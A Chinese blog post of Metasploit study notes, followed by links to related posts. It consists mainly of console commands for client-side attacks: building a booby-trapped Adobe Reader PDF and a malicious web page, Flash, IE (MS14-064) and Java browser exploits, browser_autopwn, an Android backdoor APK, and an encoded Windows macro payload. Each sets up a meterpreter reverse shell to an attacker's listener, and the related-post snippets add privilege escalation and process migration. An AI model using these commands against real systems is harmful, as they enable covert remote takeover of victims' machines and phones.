MSF学习笔记(9)

最新推荐文章于 2024-04-24 11:33:24 发布
最新推荐文章于 2024-04-24 11:33:24 发布
阅读量578 收藏 6
点赞数
分类专栏: MSF学习笔记 文章标签: msf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tianyazm/article/details/78739608
版权

利用adobe reader漏洞执行payload
构造pdf文件

msf > use exploit/windows/fileformat/adobe_utilprintf 
msf exploit(adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_utilprintf) > set lhost 1.1.1.1
msf exploit(adobe_utilprintf) > exploit

利用网址构造

msf > use exploit/windows/browser/adobe_utilprintf 
msf exploit(adobe_utilprintf) > set srvport 80
msf exploit(adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_utilprintf) > set lhost 192.168.56.103
msf exploit(adobe_utilprintf) > set lport 4445
msf exploit(adobe_utilprintf) > set uripath /pdf

flash利用

msf > use exploit/multi/browser/adobe_flash_hacking_team_uaf 
msf > use exploit/multi/browser/adobe_flash_opaque_background_uaf

浏览器自动利用

msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > set srvport 80
msf auxiliary(browser_autopwn) > set uripath /
msf auxiliary(browser_autopwn) > run

IE浏览器漏洞

msf > use exploit/windows/browser/ms14_064_ole_code_execution

jre利用漏洞

msf > use exploit/multi/browser/java_jre17_driver_manager 
msf > use exploit/multi/browser/java_jre17_jmxbean
msf > use exploit/multi/browser/java_jre17_reflection_types

android后门程序生成

msf > use payload/android/meterpreter/reverse_tcp 
msf payload(reverse_tcp) > set lhost 1.1.1.1
msf payload(reverse_tcp) > generate -f a.apk -p android -t raw

宏代码生成

root@kali:~/Desktop# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=5555 -e x86/shikata_ga_nai -f vba-exe
tianyazm
关注
专栏目录
MSF学习笔记(11)
Shadow 爬爬记
02-12 936
本地提权漏洞检测 meterpreter > run post/multi/recon/local_exploit_suggester 迁移到指定进程 migrate -N explorer.exe 自动脚本 msf exploit(multi/handler) > set AutoRunScript migrate -n explorer.exe msf ...
msf 学习笔记(1)
Shadow 爬爬记
10-20 1336
msf数据库链接root@kali:~# msfdb reinit ##数据库重建 root@kali:~# msfdb init ##数据库链接 root@kali:~# service postgresql start ##启动pgsql数据库(5432接口未启动状态【netstat -pantu | grep 5432】) root@kali:~# msfdb start
MSF学习笔记
尐猴子君ii的博客
06-21 835
贵有恒何必三更眠五更起,最无益只怕一日曝十日寒 话不多说,上干货。 MSF主要模块 渗透模块(exploit):运行时会利用目标主机漏洞进行攻击。 攻击载荷模块(payload):在成功对目标完成一次渗透之后,这段程序开始在目标主机上运行,帮助我们获取需要的访问和行动权限。 辅助模块(auxiliary):包含一系列辅助支持模块,包括扫描模块、fuzz测试漏洞发掘模块、网络协议欺骗以及其他一些模块。 编码器模块(encoder):通常用来对我们的攻击模块进行代码混淆,来逃过目标的安全保护机制的检测。目标的安
msf笔记
u012795264的博客
12-21 682
msf目录结构data:包含meterpreter,passiveX,VNC DLLs,和一些用户接口代码 msfweb,插件用到的文件 documentiation:包含msf的文档,ruby脚本,msf的API文档 external:包含meterpreter,vnc和passivex payload源码 lib:包含msf使用的ruby库 modules:包含exploits,payl
MSF学习笔记(8)
Shadow 爬爬记
12-05 327
payload 生成windows 执行payload生成msfvenom --payload-options -p windows/shell/reverse_tcp ##查看需要配置的options msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -b "\x00"
微软MSF框架学习笔记(9)
老熊的专栏
10-09 672
MSF计划阶段概览目标:创建解决方案的体系结构和设计方案、项目计划和进度表团队重点    尽可能早的发现尽可能多的问题    知道项目何时收集到足够的信息已向前推进工作在设计过程中,编写功能说明,准备工作计划,成本估算和时刻表MSF计划阶段的里程碑和交付成果交付成果    功能规格说明书    主项目计划    主项目进度表风险管理和里程碑复查报告也是在整个计划阶段中,项目组成员的任务就是编制
MSF学习笔记(10)
Shadow 爬爬记
12-11 700
宏代码生成root@kali root@kali:~/Desktop# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=5555 -e x86/shikata_ga_nai -f vba-exe 利用session 扩大战果 生成后门s
msf学习笔记(4)
Shadow 爬爬记
11-03 1100
MSF信息收集nmap扫描db_nmap -sV 192.168.1.1auxiliary扫描模块RHOSTS <>RHOST 192.168.1.1-24 192.168.1.1/24 files:/root/ip.txtarp扫描msf > use auxiliary/scanner/discovery/arp_sweep set INTERFACE ̵ RHOSTS̵ SHOST̵ S
msf学习笔记(5)
Shadow 爬爬记
11-03 442
MSF弱点扫描vnc密码破解use auxiliary/scanner/vnc/vnc_loginvnc无密码访问use auxiliary/scanner/vnc/vnc_none_authRDP远程桌面漏洞use auxiliary/scanner/rdp/ms12_020_check设备后门use auxiliary/scanner/ssh/juniper_backdoor use auxil
学习笔记msf的使用
chualam的博客
10-29 277
目标主机:2003rs2 漏洞:cve-2017-7269 ms17-010 exp搜索 : search cve-xxx 利用:use exp名称 看配置:show options 配置:set 配置名 一个值 设置payload:set payload windows/meterpreter/reverse_tcp(反弹shell) 最终攻击:exploit 把shell放后台:background 交互:session -l 然后 session -i 1 添加路由攻击内网:run autoroute
MS14-064(OLE远程代码执行漏洞复现)
Martin-share的博客
02-11 2301
MS14-064(OLE远程代码执行漏洞复现)
msf进程迁移
qq_44881113的博客
09-09 3756
msf拿到会话后 getuid #查看当前用户 ps #获取目标主机正在运行的进程 getpid #查看meterpreter shell的进程号 然后使用migrate 1692命令将shell移到PID为1692的explorer.exe进程里,因为该进程是一个稳定的应用。 migrate 1692 #迁移进程 再次查看进程发现已经改变 进程迁移后 原来的pid的2496会自动关闭,如果没有关闭输入 kill 2496 关闭进程 kill 2496 #关闭进程 run post
WEB安全:深入反射式dll注入技术
2301_76694151的博客
05-16 990
通过调用CreateRemoteThread()/NtCreateThread()/RtlCreateUserThread()函数在被注入进程创建线程进行dll注入。通过调用QueueUserAPC()/SetThreadContext()函数来劫持被注入进程已存在的线程加载dll。通过调用SetWindowsHookEx()函数来设置拦截事件,在发生对应的事件时,被注入进程执行拦截事件函数加载dll。获取被注入进程PID。在注入进程的访问令牌中开启SE_DEBUG_NAME权限。
MS14-064/CVE-2014-6332漏洞复现(OLE远程代码执行漏洞、IE浏览器漏洞)
最新发布
m0_74168970的博客
04-24 423
MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution,主要利用IE浏览器漏洞,Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,用户使用Internet Explorer浏览器查看该网站的时允许远程执行代码。show options:查看需要设置的地方。
内网渗透 Metasploit(MSF)基础使用
m0_59598029的博客
03-07 1102
msfvenom 是 msf 生成 payload 的一个工具这里要区分一下 EXP 与 Payload :EXP 是利用漏洞进行攻击动作,而 payload 是 EXP 执行成功后在目标内进行各种指令动作。除了可以将 payload 插入到 exp 里面,也可以作为独立模块进行生成,需要用这个工具生成一个落地化的,类似于会话,可移植性各种操作Armitage 就是一款使用 Java 为 Metasploit 编写的有图形化操作界面的软件,通过它可以轻松的使用 Metasploit 对目标进行攻击。
MS14-064 漏洞测试入侵win7
aozhuo4755的博客
04-25 1884
Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术, 远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本... metasploit里已经加入了此漏洞的利用模块 :exploit/windows/browser/ms14_064_ole_code_executi...
ms14_064漏洞别IE打开链接执行远控木马
sky
06-18 1675
ms14_064漏洞别IE打开链接执行远控木马 漏洞危及版本:win7/ xp 原文地址:http://wobushi.cn/  本人是将视频教程转换成了文字教程 1生成远控小马详见“ngrok配合msf生成木马” 2.将木马上传至hsf文件服务器复制链接 3.打开metasploit root@kali:~#msfconsole msf> useexploit/wi
客户端渗透之——浏览器渗透
冰河的专栏
01-24 2186
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86632106 攻击机: Kali 192.168.175.128 靶机: WinXP 192.168.175.130 1.Browser autopwn攻击 Metasploit中提供了一个browser autopwn模块,这是一个可以用来对各种浏览器进行测试和渗透的自...
msf 渗透工具学习材料
08-20
MSF(Metasploit Framework)是一款强大的开源渗透测试工具,用于测试和评估计算机系统的安全性。学习MSF渗透工具有助于提高对网络安全的理解和技能。以下是一些学习MSF渗透工具的材料和方法: 1. 官方文档:Metasploit官方网站提供了完整的文档,包括用户指南、参考手册和教程。这些文档详细介绍了MSF的各个模块、命令、选项和使用方法。 2. 书籍:有一些书籍专门介绍了MSF的原理、用法和实例。例如《Metasploit: The Penetration Tester's Guide》,该书提供了深入的MSF知识,并帮助读者掌握渗透测试的技巧。 3. 在线教程:互联网上有许多免费的MSF教程和视频教程可供学习。通过这些教程,可以了解MSF的基本操作和常用技巧,并学习如何使用不同的模块和插件。 4. 实践演练:通过自己的实践和演练来学习MSF是非常重要的。可以使用虚拟机环境搭建实验环境,模拟真实的渗透测试场景,并运用MSF进行实际的渗透测试工作。 5. 社区和论坛:Metasploit拥有活跃的社区和论坛,可以与其他渗透测试者交流经验和学习心得。在这些社区中,可以获取到最新的MSF资讯、漏洞信息和实践技巧。 需要注意的是,渗透测试是一项敏感和专业的工作,必须遵守法律和道德准则。在学习和使用MSF工具时,务必要了解和遵守相关的法律法规,避免非法使用和侵犯他人的隐私和安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值